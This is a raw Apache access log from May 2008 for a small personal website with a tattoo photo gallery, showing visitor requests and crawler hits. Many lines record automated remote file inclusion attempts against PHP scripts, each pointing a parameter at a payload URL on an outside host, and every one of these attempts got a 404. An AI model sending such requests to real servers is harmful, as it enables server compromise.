87.11.67.125 - - [10/May/2008:02:50:17 -0500] "GET /tattoo/tatc7.JPG HTTP/1.1" 200 12347 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SIMBAR={5EB2591E-885B-48F8-8A59-AF974183C733}; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
87.11.67.125 - - [10/May/2008:02:50:18 -0500] "GET /tattoo/tatc9.JPG HTTP/1.1" 200 18139 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SIMBAR={5EB2591E-885B-48F8-8A59-AF974183C733}; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
87.11.67.125 - - [10/May/2008:02:50:18 -0500] "GET /tattoo/tatc5.JPG HTTP/1.1" 200 19436 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SIMBAR={5EB2591E-885B-48F8-8A59-AF974183C733}; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
87.11.67.125 - - [10/May/2008:02:50:26 -0500] "GET /tattoo/set4.htm HTTP/1.1" 200 1991 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SIMBAR={5EB2591E-885B-48F8-8A59-AF974183C733}; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
87.11.67.125 - - [10/May/2008:02:50:26 -0500] "GET /tattoo/tatd1.JPG HTTP/1.1" 200 14507 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SIMBAR={5EB2591E-885B-48F8-8A59-AF974183C733}; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
87.11.67.125 - - [10/May/2008:02:50:26 -0500] "GET /tattoo/tatd2.JPG HTTP/1.1" 200 14891 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SIMBAR={5EB2591E-885B-48F8-8A59-AF974183C733}; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
87.11.67.125 - - [10/May/2008:02:50:26 -0500] "GET /tattoo/tatd3.JPG HTTP/1.1" 200 12386 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SIMBAR={5EB2591E-885B-48F8-8A59-AF974183C733}; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
87.11.67.125 - - [10/May/2008:02:50:26 -0500] "GET /tattoo/tatd4.JPG HTTP/1.1" 200 12068 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SIMBAR={5EB2591E-885B-48F8-8A59-AF974183C733}; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
87.11.67.125 - - [10/May/2008:02:50:26 -0500] "GET /tattoo/tatd6.JPG HTTP/1.1" 200 12059 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SIMBAR={5EB2591E-885B-48F8-8A59-AF974183C733}; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
87.11.67.125 - - [10/May/2008:02:50:26 -0500] "GET /tattoo/tatd7.JPG HTTP/1.1" 200 20479 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SIMBAR={5EB2591E-885B-48F8-8A59-AF974183C733}; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
87.11.67.125 - - [10/May/2008:02:50:26 -0500] "GET /tattoo/tatd10.JPG HTTP/1.1" 200 19089 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SIMBAR={5EB2591E-885B-48F8-8A59-AF974183C733}; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
87.11.67.125 - - [10/May/2008:02:50:27 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SIMBAR={5EB2591E-885B-48F8-8A59-AF974183C733}; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
87.11.67.125 - - [10/May/2008:02:50:27 -0500] "GET /tattoo/tatd9.JPG HTTP/1.1" 200 17368 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SIMBAR={5EB2591E-885B-48F8-8A59-AF974183C733}; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
87.11.67.125 - - [10/May/2008:02:50:27 -0500] "GET /tattoo/tatd8.JPG HTTP/1.1" 200 13038 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SIMBAR={5EB2591E-885B-48F8-8A59-AF974183C733}; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
87.11.67.125 - - [10/May/2008:02:50:55 -0500] "GET /tattoo/links.htm HTTP/1.1" 200 1325 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SIMBAR={5EB2591E-885B-48F8-8A59-AF974183C733}; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
87.11.67.125 - - [10/May/2008:02:50:55 -0500] "GET /tattoo/chinchil.JPG HTTP/1.1" 200 22675 "http://tomdolan.pconline.com/tattoo/links.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SIMBAR={5EB2591E-885B-48F8-8A59-AF974183C733}; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
207.58.138.166 - - [10/May/2008:02:53:56 -0500] "GET /logs/access_log.1207785600/admin/editor2/spaw_control.class.php?spaw_root=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 347 "-""libwww-perl/5.811"
207.58.138.166 - - [10/May/2008:02:53:56 -0500] "GET /admin/editor2/spaw_control.class.php?spaw_root=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 320 "-""libwww-perl/5.811"
207.58.138.166 - - [10/May/2008:02:53:57 -0500] "GET /logs/admin/editor2/spaw_control.class.php?spaw_root=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 325 "-""libwww-perl/5.811"
194.112.190.5 - - [10/May/2008:02:54:22 -0500] "GET /logs/access_log.1204761600//Neos_Chronos/header.php?base_folder=http://trilbardou.free.fr/ancien/id.txt??? HTTP/1.1" 404 335 "-""libwww-perl/5.803"
194.112.190.5 - - [10/May/2008:02:54:22 -0500] "GET //Neos_Chronos/header.php?base_folder=http://trilbardou.free.fr/ancien/id.txt??? HTTP/1.1" 404 308 "-""libwww-perl/5.803"
194.112.190.5 - - [10/May/2008:02:54:23 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://trilbardou.free.fr/ancien/id.txt??? HTTP/1.1" 404 313 "-""libwww-perl/5.803"
194.112.190.5 - - [10/May/2008:02:54:46 -0500] "GET /logs/access_log.1207785600//Neos_Chronos/header.php?base_folder=http://trilbardou.free.fr/ancien/id.txt??? HTTP/1.1" 404 335 "-""libwww-perl/5.803"
87.11.67.125 - - [10/May/2008:03:04:49 -0500] "GET /tattoo/links.htm HTTP/1.1" 200 1325 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SIMBAR={5EB2591E-885B-48F8-8A59-AF974183C733}; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
87.11.67.125 - - [10/May/2008:03:04:49 -0500] "GET /tattoo/chinchil.JPG HTTP/1.1" 200 22675 "http://tomdolan.pconline.com/tattoo/links.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SIMBAR={5EB2591E-885B-48F8-8A59-AF974183C733}; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
87.11.67.125 - - [10/May/2008:03:04:52 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 3776 "http://tomdolan.pconline.com/tattoo/""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SIMBAR={5EB2591E-885B-48F8-8A59-AF974183C733}; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
87.11.67.125 - - [10/May/2008:03:04:52 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SIMBAR={5EB2591E-885B-48F8-8A59-AF974183C733}; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
87.11.67.125 - - [10/May/2008:03:04:52 -0500] "GET /tattoo/webring.jpg HTTP/1.1" 200 13114 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SIMBAR={5EB2591E-885B-48F8-8A59-AF974183C733}; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
87.11.67.125 - - [10/May/2008:03:04:53 -0500] "GET /tattoo/ HTTP/1.1" 200 466 "http://search.live.com/results.aspx?mkt=it-it&FORM=TOOLBR&q=tom+tattoo&FORM=TBSP""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SIMBAR={5EB2591E-885B-48F8-8A59-AF974183C733}; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
64.15.138.183 - - [10/May/2008:03:04:57 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 313 "-""libwww-perl/5.810"
64.15.138.183 - - [10/May/2008:03:04:57 -0500] "GET //Neos_Chronos/header.php?base_folder=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 308 "-""libwww-perl/5.810"
92.51.129.236 - - [10/May/2008:03:06:45 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
92.51.129.236 - - [10/May/2008:03:06:45 -0500] "GET //Neos_Chronos/header.php?base_folder=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
67.195.37.172 - - [10/May/2008:03:07:40 -0500] "GET /?S=A HTTP/1.0" 200 1231 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
74.220.207.181 - - [10/May/2008:03:09:33 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 313 "-""libwww-perl/5.812"
74.220.207.181 - - [10/May/2008:03:09:33 -0500] "GET //Neos_Chronos/header.php?base_folder=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 308 "-""libwww-perl/5.812"
83.3.167.234 - - [10/May/2008:03:09:44 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 313 "-""libwww-perl/5.803"
83.3.167.234 - - [10/May/2008:03:09:44 -0500] "GET //Neos_Chronos/header.php?base_folder=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 308 "-""libwww-perl/5.803"
69.89.31.97 - - [10/May/2008:03:09:48 -0500] "GET //Neos_Chronos/header.php?base_folder=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 308 "-""libwww-perl/5.812"
69.89.31.97 - - [10/May/2008:03:09:48 -0500] "GET //Neos_Chronos/header.php?base_folder=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 308 "-""libwww-perl/5.812"
69.89.31.97 - - [10/May/2008:03:09:48 -0500] "GET //Neos_Chronos/header.php?base_folder=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 308 "-""libwww-perl/5.812"
69.89.31.97 - - [10/May/2008:03:09:48 -0500] "GET //Neos_Chronos/header.php?base_folder=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 308 "-""libwww-perl/5.812"
69.89.31.97 - - [10/May/2008:03:09:48 -0500] "GET //Neos_Chronos/header.php?base_folder=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 308 "-""libwww-perl/5.812"
74.220.207.181 - - [10/May/2008:03:09:55 -0500] "GET //Neos_Chronos/header.php?base_folder=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 308 "-""libwww-perl/5.812"
212.58.4.204 - - [10/May/2008:03:10:07 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 313 "-""libwww-perl/5.65"
212.58.4.204 - - [10/May/2008:03:10:07 -0500] "GET //Neos_Chronos/header.php?base_folder=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 308 "-""libwww-perl/5.65"
92.51.129.236 - - [10/May/2008:03:10:19 -0500] "GET //Neos_Chronos/header.php?base_folder=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
64.15.138.183 - - [10/May/2008:03:10:24 -0500] "GET //Neos_Chronos/header.php?base_folder=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 308 "-""libwww-perl/5.810"
87.230.10.251 - - [10/May/2008:03:10:28 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 313 "-""libwww-perl/5.803"
87.230.10.251 - - [10/May/2008:03:10:28 -0500] "GET //Neos_Chronos/header.php?base_folder=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 308 "-""libwww-perl/5.803"
92.51.129.236 - - [10/May/2008:03:10:30 -0500] "GET //Neos_Chronos/header.php?base_folder=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
87.230.10.251 - - [10/May/2008:03:10:44 -0500] "GET //Neos_Chronos/header.php?base_folder=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 308 "-""libwww-perl/5.803"
92.51.129.236 - - [10/May/2008:03:11:15 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
92.51.129.236 - - [10/May/2008:03:11:15 -0500] "GET //Neos_Chronos/header.php?base_folder=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
212.58.4.204 - - [10/May/2008:03:11:47 -0500] "GET //Neos_Chronos/header.php?base_folder=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 308 "-""libwww-perl/5.65"
83.3.167.234 - - [10/May/2008:03:12:39 -0500] "GET //Neos_Chronos/header.php?base_folder=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 308 "-""libwww-perl/5.803"
87.1.92.216 - - [10/May/2008:03:13:55 -0500] "GET /logs/access_log.1207785600//appserv/main.php?appserv_root=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 328 "-""libwww-perl/5.808"
87.1.92.216 - - [10/May/2008:03:14:06 -0500] "GET /logs//appserv/main.php?appserv_root=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 306 "-""libwww-perl/5.808"
74.6.21.43 - - [10/May/2008:03:15:33 -0500] "GET /tattoo/tattoo1.htm HTTP/1.0" 200 3776 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
87.1.92.216 - - [10/May/2008:03:16:55 -0500] "GET /logs/access_log.1204761600//appserv/main.php?appserv_root=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 328 "-""libwww-perl/5.808"
207.44.147.74 - - [10/May/2008:03:24:34 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.arpel.org/ex/baram.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.811"
207.44.147.74 - - [10/May/2008:03:24:34 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.arpel.org/ex/baram.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.811"
74.6.8.42 - - [10/May/2008:03:26:12 -0500] "GET /logs/access_log.1175990400 HTTP/1.0" 200 140028 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
207.44.147.74 - - [10/May/2008:03:27:45 -0500] "GET /logs/access_log.1207785600//newspublish/include.php?path%5Bdocroot%5D=http://www.arpel.org/ex/baram.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.811"
207.44.147.74 - - [10/May/2008:03:27:45 -0500] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.arpel.org/ex/baram.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.811"
207.44.147.74 - - [10/May/2008:03:27:46 -0500] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.arpel.org/ex/baram.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.811"
207.44.147.74 - - [10/May/2008:03:28:01 -0500] "GET /logs/access_log.1207008000//newspublish/include.php?path%5Bdocroot%5D=http://www.arpel.org/ex/baram.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.811"
74.6.16.233 - - [10/May/2008:03:37:20 -0500] "GET /logs/access_log.1185580800 HTTP/1.0" 304 - "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.31.189 - - [10/May/2008:03:38:59 -0500] "GET / HTTP/1.0" 200 1231 "-""Mozilla/5.0 (compatible; Yahoo! DE Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
72.232.251.10 - - [10/May/2008:03:40:12 -0500] "GET /logs/errors.php?error=http://61.19.234.26/test.txt??? HTTP/1.1" 404 299 "-""Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
72.232.251.10 - - [10/May/2008:03:40:17 -0500] "GET /errors.php?error=http://61.19.234.26/test.txt??? HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
69.89.31.97 - - [10/May/2008:03:40:44 -0500] "GET /logs/access_log.1204761600//Neos_Chronos/header.php?base_folder=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 335 "-""libwww-perl/5.812"
69.89.31.97 - - [10/May/2008:03:40:44 -0500] "GET //Neos_Chronos/header.php?base_folder=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 308 "-""libwww-perl/5.812"
69.89.31.97 - - [10/May/2008:03:40:45 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 313 "-""libwww-perl/5.812"
69.89.31.97 - - [10/May/2008:03:40:49 -0500] "GET /logs/access_log.1207785600//Neos_Chronos/header.php?base_folder=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 335 "-""libwww-perl/5.812"
64.242.234.146 - - [10/May/2008:03:45:08 -0500] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 338 "-""libwww-perl/5.79"
64.242.234.146 - - [10/May/2008:03:45:08 -0500] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 333 "-""libwww-perl/5.79"
67.59.151.227 - - [10/May/2008:03:45:10 -0500] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 338 "-""libwww-perl/5.79"
67.59.151.227 - - [10/May/2008:03:45:10 -0500] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 333 "-""libwww-perl/5.79"
72.30.179.220 - - [10/May/2008:03:48:01 -0500] "GET /logs/access_log.1173398400 HTTP/1.0" 304 - "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.220.207.181 - - [10/May/2008:03:48:14 -0500] "GET /logs/access_log.1204761600//Neos_Chronos/header.php?base_folder=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 335 "-""libwww-perl/5.812"
74.220.207.181 - - [10/May/2008:03:48:14 -0500] "GET //Neos_Chronos/header.php?base_folder=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 308 "-""libwww-perl/5.812"
74.220.207.181 - - [10/May/2008:03:48:14 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 313 "-""libwww-perl/5.812"
69.89.31.97 - - [10/May/2008:03:48:14 -0500] "GET /logs/access_log.1204761600//Neos_Chronos/header.php?base_folder=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 335 "-""libwww-perl/5.812"
69.89.31.97 - - [10/May/2008:03:48:14 -0500] "GET /logs/access_log.1204761600//Neos_Chronos/header.php?base_folder=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 335 "-""libwww-perl/5.812"
69.89.31.97 - - [10/May/2008:03:48:14 -0500] "GET /logs/access_log.1204761600//Neos_Chronos/header.php?base_folder=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 335 "-""libwww-perl/5.812"
69.89.31.97 - - [10/May/2008:03:48:15 -0500] "GET //Neos_Chronos/header.php?base_folder=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 308 "-""libwww-perl/5.812"
69.89.31.97 - - [10/May/2008:03:48:15 -0500] "GET //Neos_Chronos/header.php?base_folder=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 308 "-""libwww-perl/5.812"
69.89.31.97 - - [10/May/2008:03:48:15 -0500] "GET //Neos_Chronos/header.php?base_folder=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 308 "-""libwww-perl/5.812"
69.89.31.97 - - [10/May/2008:03:48:15 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 313 "-""libwww-perl/5.812"
69.89.31.97 - - [10/May/2008:03:48:15 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 313 "-""libwww-perl/5.812"
69.89.31.97 - - [10/May/2008:03:48:15 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 313 "-""libwww-perl/5.812"
69.89.31.97 - - [10/May/2008:03:48:15 -0500] "GET /logs/access_log.1204761600//Neos_Chronos/header.php?base_folder=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 335 "-""libwww-perl/5.812"
69.89.31.97 - - [10/May/2008:03:48:15 -0500] "GET /logs/access_log.1204761600//Neos_Chronos/header.php?base_folder=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 335 "-""libwww-perl/5.812"
69.89.31.97 - - [10/May/2008:03:48:15 -0500] "GET //Neos_Chronos/header.php?base_folder=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 308 "-""libwww-perl/5.812"
69.89.31.97 - - [10/May/2008:03:48:15 -0500] "GET //Neos_Chronos/header.php?base_folder=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 308 "-""libwww-perl/5.812"
69.89.31.97 - - [10/May/2008:03:48:16 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 313 "-""libwww-perl/5.812"
69.89.31.97 - - [10/May/2008:03:48:16 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 313 "-""libwww-perl/5.812"
74.220.207.181 - - [10/May/2008:03:48:19 -0500] "GET /logs/access_log.1207785600//Neos_Chronos/header.php?base_folder=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 335 "-""libwww-perl/5.812"
69.89.31.97 - - [10/May/2008:03:48:20 -0500] "GET /logs/access_log.1207785600//Neos_Chronos/header.php?base_folder=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 335 "-""libwww-perl/5.812"
69.89.31.97 - - [10/May/2008:03:48:20 -0500] "GET /logs/access_log.1207785600//Neos_Chronos/header.php?base_folder=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 335 "-""libwww-perl/5.812"
69.89.31.97 - - [10/May/2008:03:48:20 -0500] "GET /logs/access_log.1207785600//Neos_Chronos/header.php?base_folder=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 335 "-""libwww-perl/5.812"
69.89.31.97 - - [10/May/2008:03:48:20 -0500] "GET /logs/access_log.1207785600//Neos_Chronos/header.php?base_folder=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 335 "-""libwww-perl/5.812"
69.89.31.97 - - [10/May/2008:03:48:20 -0500] "GET /logs/access_log.1207785600//Neos_Chronos/header.php?base_folder=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 335 "-""libwww-perl/5.812"
207.44.147.74 - - [10/May/2008:03:51:11 -0500] "GET /logs/access_log.1207785600//oneadmin/photogallery/include.php?path[docroot]=http://www.arpel.org/ex/baram.txt?? HTTP/1.1" 404 345 "-""libwww-perl/5.811"
207.44.147.74 - - [10/May/2008:03:51:11 -0500] "GET //oneadmin/photogallery/include.php?path[docroot]=http://www.arpel.org/ex/baram.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.811"
207.44.147.74 - - [10/May/2008:03:51:11 -0500] "GET /logs//oneadmin/photogallery/include.php?path[docroot]=http://www.arpel.org/ex/baram.txt?? HTTP/1.1" 404 323 "-""libwww-perl/5.811"
207.44.147.74 - - [10/May/2008:03:51:18 -0500] "GET /logs/access_log.1207180800//oneadmin/photogallery/include.php?path[docroot]=http://www.arpel.org/ex/baram.txt?? HTTP/1.1" 404 345 "-""libwww-perl/5.811"
92.51.129.236 - - [10/May/2008:03:53:28 -0500] "GET /logs/access_log.1204761600//Neos_Chronos/header.php?base_folder=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
92.51.129.236 - - [10/May/2008:03:53:28 -0500] "GET //Neos_Chronos/header.php?base_folder=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
92.51.129.236 - - [10/May/2008:03:53:29 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
92.51.129.236 - - [10/May/2008:03:53:36 -0500] "GET /logs/access_log.1207785600//Neos_Chronos/header.php?base_folder=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
92.51.129.236 - - [10/May/2008:03:56:54 -0500] "GET /logs/access_log.1204761600//Neos_Chronos/header.php?base_folder=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
92.51.129.236 - - [10/May/2008:03:56:55 -0500] "GET //Neos_Chronos/header.php?base_folder=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
92.51.129.236 - - [10/May/2008:03:56:55 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
92.51.129.236 - - [10/May/2008:03:57:03 -0500] "GET /logs/access_log.1207785600//Neos_Chronos/header.php?base_folder=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
67.19.61.90 - - [10/May/2008:04:04:11 -0500] "GET /logs/access_log.1207785600//faqsupport/samplefaqsupport.php?path[docroot]=http://www.onyxclub.ru/administrator/components/com_remository/idf.txt? HTTP/1.1" 404 343 "-""libwww-perl/5.811"
67.19.61.90 - - [10/May/2008:04:04:11 -0500] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.onyxclub.ru/administrator/components/com_remository/idf.txt? HTTP/1.1" 404 316 "-""libwww-perl/5.811"
67.19.61.90 - - [10/May/2008:04:04:11 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.onyxclub.ru/administrator/components/com_remository/idf.txt? HTTP/1.1" 404 321 "-""libwww-perl/5.811"
67.19.61.90 - - [10/May/2008:04:04:14 -0500] "GET /logs/access_log.1207180800//faqsupport/samplefaqsupport.php?path[docroot]=http://www.onyxclub.ru/administrator/components/com_remository/idf.txt? HTTP/1.1" 404 343 "-""libwww-perl/5.811"
207.44.147.74 - - [10/May/2008:04:06:52 -0500] "GET /logs/access_log.1207785600//skin/zero_vote/ask_password.php?dir=http://www.arpel.org/ex/baram.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.811"
207.44.147.74 - - [10/May/2008:04:06:52 -0500] "GET //skin/zero_vote/ask_password.php?dir=http://www.arpel.org/ex/baram.txt?? HTTP/1.1" 404 316 "-""libwww-perl/5.811"
207.44.147.74 - - [10/May/2008:04:06:52 -0500] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.arpel.org/ex/baram.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.811"
65.55.208.123 - - [10/May/2008:04:16:49 -0500] "GET /logs/access_log.1154908800 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.123 - - [10/May/2008:04:16:49 -0500] "GET /logs/access_log.1201046400 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
